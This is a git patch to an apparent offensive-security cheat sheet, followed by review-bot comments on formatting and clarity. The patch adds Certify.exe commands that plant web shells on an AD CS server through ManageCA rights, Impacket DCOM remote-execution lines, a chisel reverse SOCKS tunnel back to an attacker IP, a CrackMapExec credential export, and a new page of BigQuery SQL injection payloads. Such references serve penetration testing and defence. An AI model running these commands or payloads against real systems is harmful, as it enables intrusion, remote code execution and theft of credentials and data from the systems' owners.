From 71dcfd5ca765fe7d1397c62a733066c63bceed19 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 18 Feb 2022 14:50:38 +0100 Subject: [PATCH] ADCS ESC7 Shell + Big Query SQL --- .../Active Directory Attack.md | 32 ++++++++- .../Miscellaneous - Tricks.md | 10 +++ .../Network Pivoting Techniques.md | 7 +- SQL Injection/BigQuery Injection.md | 70 +++++++++++++++++++ 4 files changed, 114 insertions(+), 5 deletions(-) create mode 100644 SQL Injection/BigQuery Injection.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c0c16fe..60637d8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ``` -You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. +You can add some custom queries like : +* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) +* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) +* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) + +Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. ### Using PowerView 
@@ -2302,6 +2307,22 @@ Exploitation: Certify.exe setconfig /removeapproval /restart ``` +Alternative exploitation from **ManageCA** to **RCE** on ADCS server: + +```ps1 +# Get the current CDP list. Useful to find remote writable shares: +Certify.exe writefile /ca:SERVER\ca-name /readonly + +# Write an aspx shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx + +# Write the default asp shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp + +# Write a php shell to a remote web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php +``` + #### ESC8 - AD CS Relay Attack @@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38 > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. -* Impacket DcomExec.py +* Impacket DCOMExec.py ```ps1 dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] dcomexec.py -share C$ -object MMC20 '/:@' dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' + + python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' + # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. + # -silentcommand executes the command without attempting to retrieve the output. ``` * CheeseTools - https://github.com/klezVirus/CheeseTools ```powershell 
@@ -3493,4 +3518,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) \ No newline at end of file +* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) +* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md index 1794178..e82618b 100644 --- a/Methodology and Resources/Miscellaneous - Tricks.md +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -14,4 +14,14 @@ $ wall "Stop messing with the XXX service !" $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root $ who $ write root pts/2 # press Ctrl+D after typing the message. +``` + +## CrackMapExec Credential Database + +```ps1 +cmedb (default) > workspace create test +cmedb (test) > workspace default +cmedb (test) > proto smb +cmedb (test)(smb) > creds +cmedb (test)(smb) > export creds csv /tmp/creds ``` \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 68a6197..39e40aa 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md 
+++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -8,7 +8,7 @@ * [Local Port Forwarding](#local-port-forwarding) * [Remote Port Forwarding](#remote-port-forwarding) * [Proxychains](#proxychains) -* [Graphtcp](#graphtcp) +* [Graftcp](#graftcp) * [Web SOCKS - reGeorg](#web-socks---regeorg) * [Web SOCKS - pivotnacci](#web-socks---pivotnacci) * [Metasploit](#metasploit) @@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" go get -v github.com/jpillora/chisel # forward port 389 and 88 to hacker computer -user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse +user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 + +# SOCKS +user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks ``` ### SharpChisel diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md new file mode 100644 index 0000000..ed84975 --- /dev/null +++ b/SQL Injection/BigQuery Injection.md 
@@ -0,0 +1,70 @@ +# Google BigQuery SQL Injection + +## Summary + +* [Detection](#detection) +* [BigQuery Comment](#bigquery-comment) +* [BigQuery Union Based](#bigquery-union-based) +* [BigQuery Error Based](#bigquery-error-based) +* [BigQuery Boolean Based](#bigquery-boolean-based) +* [BigQuery Time Based](#bigquery-time-based) +* [References](#references) + +## Detection + +* Use a classic single quote to trigger an error: `'` +* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...``` + +```ps1 +# Gathering project id +select @@project_id + +# Gathering all dataset names +select schema_name from INFORMATION_SCHEMA.SCHEMATA + +# Gathering data from specific project id & dataset +select * from `project_id.dataset_name.table_name` +``` + +## BigQuery Comment + +```ps1 +select 1#from here it is not working +select 1/*between those it is not working*/ +``` + +## BigQuery Union Based + +```ps1 +UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name# +``` + +## BigQuery Error Based + +```ps1 +# Error based - division by zero +' OR if(1/(length((select('a')))-1)=1,true,false) OR ' + +# Error based - casting: select CAST(@@project_id AS INT64) +dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC# +``` + +## BigQuery Boolean Based + +```ps1 +' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'# +``` + +## BigQuery Time Based + +* Time based functions does not exist in the BigQuery syntax. 
+ +## References + +* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) +* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax) +* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) +* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/) \ No newline at end of file
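Review bot: Style point on the BloodHound custom-queries hunk: `You can add some custom queries like :` carries a stray space before the colon; write `like:`. Turning the single run-on sentence into a bullet list is an improvement, and keeping `Replace the customqueries.json file located at ...` as its own paragraph after the list reads well. One consistency nit: the two existing entries link to `github.com/.../blob/master/customqueries.json` while the new Exegol entry links to `raw.githubusercontent.com`; either form works, but mixing them in one list makes it look like one of them is a typo.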
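Review bot: Missing documentation in the ESC7 `writefile` block: it never says what `Certify.exe writefile` changes on the CA or how to undo it, whereas the ESC7 commands just above it end with an explicit cleanup step (`Certify.exe setconfig /removeapproval /restart`). The first comment (`Get the current CDP list`) implies the CA's CRL distribution point configuration is what gets altered, so a one-line prerequisite and impact note would help: that the technique needs ManageCA rights on the CA, that it modifies CA configuration that is visible in the CA's settings and event logs, and that the reference `AD CS: from ManageCA to RCE` added later in this same patch is where the full write-up lives. Minor: the CA placeholder is `SERVER\ca-name` in every `/ca:` argument but `CA-Name` in the `/path:C:\Windows\SystemData\CES\CA-Name\shell.aspx` directory on the second command; pick one spelling for the placeholder.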
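Review bot: Fence and language mismatch in the dcomexec hunk: the block is tagged `ps1`, but the added line `python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'` uses POSIX shell variables and a backslash-escaped `$`, which is bash quoting, not PowerShell. Either retag the block `bash` or use the same `DOMAIN/USER:PASSWORD@HOST` placeholder form as the two `'/:@'` lines above it so the three invocations read consistently. The bullet rename `Impacket DcomExec.py` to `Impacket DCOMExec.py` also disagrees with the script name used in every command (`dcomexec.py`); the lower-case file name in the bullet would match. The two added explanatory comments (`-object MMC20 ...` and `-silentcommand ...`) are exactly the kind of context the older lines lacked; keep them.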
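Review bot: Style point on the references hunk: the new entry is ordered `Title - Date - Authors` (`AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh`) while the entry directly above it uses `Title - Author - Date` (`AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022`); align the new line with the existing pattern. Adding the trailing newline that the previous version lacked is a welcome fix.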
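Review bot: Possible inconsistency in the new `CrackMapExec Credential Database` transcript: after `workspace create test` the prompt becomes `cmedb (test)`, yet after the next command, `workspace default`, the prompt still reads `cmedb (test)`. If `workspace <name>` switches the active workspace, the prompt should change to `(default)` and the later `creds` and `export creds csv /tmp/creds` would then operate on the `default` workspace, not `test`; if the intent was to keep working in `test`, the `workspace default` line is either a leftover or needs a comment saying what it does. Please verify against the tool and make the prompts agree with the commands. Two smaller points: `ps1` is the wrong fence tag for an interactive cmedb session (a plain or `bash` fence avoids implying PowerShell), and a one-sentence lead-in saying that cmedb holds the credentials CME has collected and that the export produces a plaintext CSV would tell readers what this section is for and that the resulting file needs the same handling as any other credential material.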
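Review bot: In the chisel hunk the reorder puts `user@hacker$ /opt/chisel/chisel server -p 8008 --reverse` before the client command, which is the correct order, but the comment `# forward port 389 and 88 to hacker computer` now sits directly above the server line rather than the `user@victim$ .\chisel.exe client ...` line it describes; move the comment down to the client line or reword it to introduce the whole block. The new `# SOCKS` entry (`R:socks`) should say where the resulting SOCKS listener is exposed, namely on the server side (the operator's host; chisel's default SOCKS port is 1080) and not on the victim, so readers know which end to point their proxy configuration at; the Proxychains section already listed in the TOC is the natural cross-reference. The `Graphtcp` to `Graftcp` TOC correction looks right.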
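Review bot: Several documentation and style issues in the new `SQL Injection/BigQuery Injection.md`. Grammar: `Time based functions does not exist in the BigQuery syntax.` should read `Time-based functions do not exist in the BigQuery syntax.` Every code block is tagged `ps1` although the content is SQL; tag them `sql`. In the Comment section the inline comments `#from here it is not working` and `/*between those it is not working*/` are easy to misread as "this comment syntax does not work" when they mean the opposite (text inside the comment is ignored); reword to something like `# everything after this is ignored`, and note that BigQuery also accepts `--` as a single-line comment alongside `#` and `/* */`. The Detection bullet ```` ```SELECT .... FROM `` AS ...``` ```` nests backticks inside a triple-backtick inline span, which renders poorly in Markdown; use a double-backtick span with spaces (`` `SELECT ... FROM `dataset.table` AS ...` ``) or a small fenced block. The Union Based block gives no hint that the run of `1` placeholders must match the column count of the original query, and the Error Based casting line starts with a closing backtick that is easy to overlook; a short comment on each would make the payloads readable rather than copy-only. The reference `BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14` is missing its year while the other entries carry full dates. Finally, since the file has no remediation line at all, one sentence noting that BigQuery supports parameterized queries (named and positional query parameters through the API and client libraries), which is the fix for every payload on this page, would round the document out.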